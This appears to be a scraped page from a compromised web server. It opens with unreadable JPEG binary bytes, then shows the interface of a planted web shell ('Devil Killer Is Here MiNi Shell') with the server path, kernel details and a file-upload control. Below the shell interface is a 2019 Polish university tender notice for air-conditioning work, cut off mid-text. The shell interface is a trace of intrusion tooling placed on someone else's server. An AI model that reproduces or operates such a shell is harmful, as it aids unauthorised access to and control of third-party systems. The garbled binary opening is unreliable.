JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190726/578947-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 578947-N-2019 z dnia 2019-07-26 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Zachodniopomorski Uniwersytet Technologiczny w Szczecinie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Zaprojektowanie i wykonanie robót budowlanych polegających na instalacji systemu klimatyzacji w Bibliotece Głównej ZUT przy ul. Ku Słońcu 140 w Szczecinie</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Zachodniopomorski Uniwersytet Technologiczny w Szczecinie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">32058816100000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Al. Piastów</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">17</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">70-310</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Szczecin</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">zachodniopomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">91 449 4916, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">dzp@zut.edu.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">-</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">https://www.zut.edu.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Uczelnia publiczna</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://www.zamowienia.zut.edu.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://www.zamowienia.zut.edu.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Pod rygorem nieważności oferta podlega złożeniu wyłącznie z zachowaniem formy pisemnej. Zamawiający nie wyraża zgody na złożenie oferty w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Kancelaria Główna Zachodniopomorskiego Uniwersytetu Technologicznego w Szczecinie, 70-310 Szczecin, al. Piastów 18, pok. 10</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Zaprojektowanie i wykonanie robót budowlanych polegających na instalacji systemu klimatyzacji w Bibliotece Głównej ZUT przy ul. Ku Słońcu 140 w Szczecinie</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP/R/BG/344/2018/19 - II</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.Przedmiotem zamówienia jest zaprojektowanie i wykonanie robót budowlanych polegających nainstalacji systemu klimatyzacji w Bibliotece Głównej ZUT przy ul. Ku Słońcu 140 w Szczecinie wraz zuzyskaniem niezbędnych uzgodnień oraz pozwoleń wymaganych przepisami prawa. 2. Szczegółowy opisprzedmiotu zamówienia, w tym lokalizację i zakres przewidzianych do wykonania prac i robótbudowlanych stanowiących przedmiot niniejszego zamówienia określa zespół dokumentów, na któryskładają się: 1) Załącznik nr 2 do SIWZ - Program Funkcjonalno-Użytkowy (PFU); 2) Załącznik nr 3 doSIWZ - Warunki przyłączenia do sieci elektroenergetycznej; 3) Załącznik nr 4 do SIWZ - ArchiwalnyProjekt Wykonawczy Architektury i Elektryczny 3. W zakres (przedmiot) niniejszego zamówienia do wykonania po stronie Wykonawcy związane z rozpoczęciem, wykonywaniem i ukończeniem robótbudowlanych stanowiących przedmiot niniejszego zamówienia wchodzi w szczególności: 1) Wykonaniedokumentacji budowlanej wszystkich branż niezbędnej do zrealizowania zadania inwestycyjnego wzakresie wynikającym z programu funkcjonalno - użytkowego wraz z uzyskaniem wszelkichniezbędnych uzgodnień, odstępstw, ekspertyz, 2) Złożenie w imieniu Zamawiającego w WUiAB UrzęduMiejskiego w Szczecinie wniosku o wydanie decyzji o pozwoleniu na budowę, lub zgłoszenia o zamiarzerozpoczęcia robót nie wymagających pozwolenia na budowę (zgodnie z obowiązującym prawem) 3)Wykonanie dokumentacji wykonawczej wszystkich branż, przedmiarów robót, kosztorysówinwestorskich oraz specyfikacji technicznych wykonania i odbioru robót, 4) Uzyskanie w imieniuZamawiającego pozwolenia na budowę ( o ile pozwolenie na budowę będzie wymagane 5) Pełnienienadzoru autorskiego przez cały okres trwania robót budowlanych, 6) Wykonanie robót budowlanychwszystkich branż wynikających z zatwierdzonej dokumentacji projektowej, 7) Przygotowaniedokumentacji powykonawczej, 8) Uzyskanie w imieniu Zamawiającego wszelkich decyzji, uzgodnień ipozwolenia na użytkowanie jeżeli będzie takie wymaganie przepisami prawa. 4. Poza zakresem(przedmiotem) wymienionym w ust. 3 powyżej, do wykonania po stronie Wykonawcy, wchodzą równieżświadczenia dodatkowe, w tym w szczególności: 1) Pozyskanie, nabycie i dostarczenie na miejscerealizacji zamówienia (teren budowy) niezbędnych materiałów i urządzeń budowlanych, narzędzi lubinnego rodzaju sprzętu i maszyn do wykonania robot budowalnych składających się na przedmiotniniejszego zamówienia; 2) Dobór i utrzymywanie odpowiedniego personelu do realizacji niniejszegozamówienia, w tym zapewnienie kierującego pracami projektowymi, kierownika budowy orazkierowników branż (elektrycznej i sanitarnej, posiadających uprawnienia we wskazanym zakresie bezograniczeń, przy czym obowiązki kierownika branży elektrycznej czy sanitarnej pełnić może również tasama osoba, która sprawować będzie funkcje kierownika budowy); 3) Przygotowanie dokumentacjipowykonawczej; 4) Uzyskanie dla Zamawiającego niezbędnych decyzji i pozwolenia na użytkowanieobiektu jeżeli takie będzie wymagane zgodnie z obowiązującym prawem; 5) Udzielenie Zamawiającemu:a) minimum 48 miesięcznej gwarancji na dokumentację projektową i kosztorysową, licząc od datydokonania odbioru końcowego. b) minimum 60 miesięcznej gwarancji wykonanych w ramachniniejszego zamówienia robót budowlanych, jak również wbudowanych, zainstalowanych lub w innysposób zastosowanych materiałów i urządzeń budowlanych. 6) Usuwanie wszystkich wad i usterek ztytułu udzielonej gwarancji jakości oraz w ramach odpowiedzialności z tytułu rękojmi za wady. 5. Wzakres (przedmiot) niniejszego zamówienia wchodzą czynności, które mogą być wykonywane wyłącznieprzez osoby zatrudnione na podstawie umowy o pracę. Zamawiający - stosownie do art. 29 ust. 3a orazart. 36 ust. 8a lit c) ustawy PZP - podaje, iż wyznaczony przez niego zakres (rodzaj) czynnościzamówienia, polegający na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26.06.1974 r. - Kodeks pracy, określają postanowienia § 4a wzoru umowy o zamówienie, o którym towzorze mowa jest w dziale XV ust. 1 SIWZ (Wzór Umowy). 6. Szczegółowy rodzaj i zakres (w tymrozmiar) leżących po stronie Wykonawcy świadczeń dodatkowych składających się (obok robótbudowlanych) na przedmiot niniejszego zamówienia, jak też warunki ich realizacji, w tym - wwykonaniu art. 36 ust. 8a lit a) i b) ustawy PZP - środki dokumentowania i kontroli spełniania obowiązkuzatrudnienia, o którym mowa w ust. 4 niniejszego działu, jak też sankcji umownych z tytułu niespełnieniatych wymagań - zawiera Wzór Umowy. 7. Wykonawca może powierzyć wykonanie części niniejszegozamówienia podwykonawcy. Szczegóły dotyczące podwykonawstwa przy realizacji niniejszegozamówienia podaje Wzór Umowy, w tym w szczególności znajdujące się tam postanowienia § 2. 8. Wwykonaniu art. 36 ust. 2 pkt 11 ustawy PZP Zamawiający podaje, iż: 1) Wymagania dotyczące umowy opodwykonawstwo, której przedmiotem są roboty budowlane, których nie spełnienie spowodujezgłoszenie przez Zamawiającego odpowiednio zastrzeżeń, o których mowa w art. 143b ust. 3 ustawy PZPlub sprzeciwu, o którym mowa w art. 143b ust. 6 ustawy PZP - podają postanowienia § 2 Wzoru Umowy;2) Informacje o umowach o podwykonawstwo, których przedmiotem są dostawy lub usługi, które z uwagina wartość lub przedmiot tych dostaw lub usług nie podlegają obowiązkowi przedkładaniaZamawiającemu - podają postanowienia § 2 ust. 5 Wzoru Umowy. 9. Zamawiający w niniejszympostępowaniu: 1) Nie czyni zastrzeżeń, o których mowa w art. 36a ust. 2 ustawy PZP; 2) Nie stawiażądania, o którym mowa w art. 25a ust. 5 pkt 2 ustawy PZP), z zastrzeżeniem ust. 10 poniżej. 10.Postanowienie ust. 9 pkt 2) niniejszego działu nie dotyczy sytuacji, kiedy Wykonawca - w wykonaniuuprawnień działu VI ust. 4 SIWZ - wykazuje spełnienie określonego w dziale VI ust. 2 SIWZ warunkuudziału w niniejszym postępowaniu zasobami innego podmiotu (nazywanych w dziale VI ust. 4 SIWZPODMIOTEM TRZECIM/PODMIOTAMI TRZECIMI). [Informacja dodatkowa] 11. Podając powyższe,Zamawiający stosownie do art. 67 ust. 1a ustawy PZP, informuje również, iż w dziale XVII SIWZwskazany został ewentualny zakres oraz warunki udzielenia zamówień (robót budowlanych)wykraczających za zakres niniejszego zamówienia (i nie stanowiących przedmiotu niniejszegopostępowania), podlegających ewentualnemu udzieleniu na podstawie art. 67 ust. 1 pkt 6 ustawy PZP,przy czym zgodnie z informacją podaną w dziale XVII ust. 5 SIWZ ewentualne udzielenie takichzamówień jest prawem (a nie obowiązkiem) Zamawiającego. Tak Wykonawcy, jak i Zamawiającemu niesłuży roszczenie o ich udzielenie.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45300000-0</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71000000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71300000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71320000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45310000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45310000-3</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, októrych mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: 1. Zamawiający przewidujeudzielenie Wykonawcy, z którym zostanie zawarta umowa w sprawie niniejszego zamówienia (Umowa ozamówienie) zamówień, o których mowa w art. 67 ust. 1 pkt 6 ustawy PZP (zwanych dalejZamówieniami dodatkowymi), których ewentualny zakres i warunki udzielenia podają postanowieniaponiższe. 2. Przy spełnieniu pozostałych wymogów art. 67 ust. 1 pkt 6 ustawy PZP, ewentualny zakresZamówień dodatkowych stanowią roboty budowlane polegające na powtórzeniu wszystkich lubniektórych robót ogólnobudowlanych, elektrycznych i sanitarnych wraz z dostawą urządzeń,wykonywanych w celu instalacji systemu klimatyzacji w Bibliotece Głównej ZUT w Szczecinie,(podlegającego budowie w wykonaniu niniejszego zamówienia podstawowego), w tym w szczególności:rozbudowy lub budowy systemu klimatyzacji w pomieszczeniach dotychczas nie posiadających systemuklimatyzacji). 3. Zamówienia dodatkowe będą łącznie stanowić nie więcej niż 299 512,20 zł netto. Wramach wskazanego limitu Zamówienia dodatkowe mogą być udzielane, w zależności od wyboru lubpotrzeb Zamawiającego, na wszystkie lub niektóre ze zdarzeń spośród wskazanych w ust. 2 niniejszegodziału, a nadto w ramach jednego, dwóch lub więcej postępowań (i w konsekwencji zawarciu jednej,dwóch lub więcej umów) na Zamówienia dodatkowe. 4. Każdorazowe udzielanie Zamówieńdodatkowych nastąpi poprzez zawarcie w formie pisemnej umowy z Wykonawcą, w oparciu o wcześniejprzeprowadzone postępowanie z wolnej ręki w oparciu o zaproszenie do negocjacji przekazane Wykonawcy przy czym za tego Wykonawcę uważani będą również nowi wykonawcy, o których w art.144 ust. 1 pkt 4) ustawy PZP (w przypadkach tam wskazanych, jeżeli będą miały miejsce w odniesieniudo Umowy o Zamówienie dodatkowe). Będzie miał zastosowanie art. 68 ustawy PZP, przy czym wpostępowaniu z wolnej ręki na Zamówienia dodatkowe badane będą podstawy wykluczenia z art. 24 ust.1 ustawy PZP. Zamawiający, na potwierdzenie braku podstaw do wykluczenia, o których mowa w art. 24ust. 1 ustawy PZP nie będzie żądał dokumentów innych niż wstępne oświadczenie Wykonawcy w tymzakresie, o którym mowa w art. 25a ust. 1 ustawy PZP (dla zamówień poniżej progów UE), chyba, żeprzepisy ustawy PZP obowiązujące na moment wszczęcia i prowadzenia takiego postępowania będąstanowić inaczej. Wyżej wskazane oświadczenie z art. 25a ustawy PZP wymagać będzie złożenia zgodniez art. 25a ust. 4 ustawy PZP. W postępowaniu z wolnej ręki o Zamówienie dodatkowe Zamawiający niebędzie określał warunków udziału z art. 22 ustawy PZP. Przekazywane wraz z zaproszeniem donegocjacji Zamówienia dodatkowego 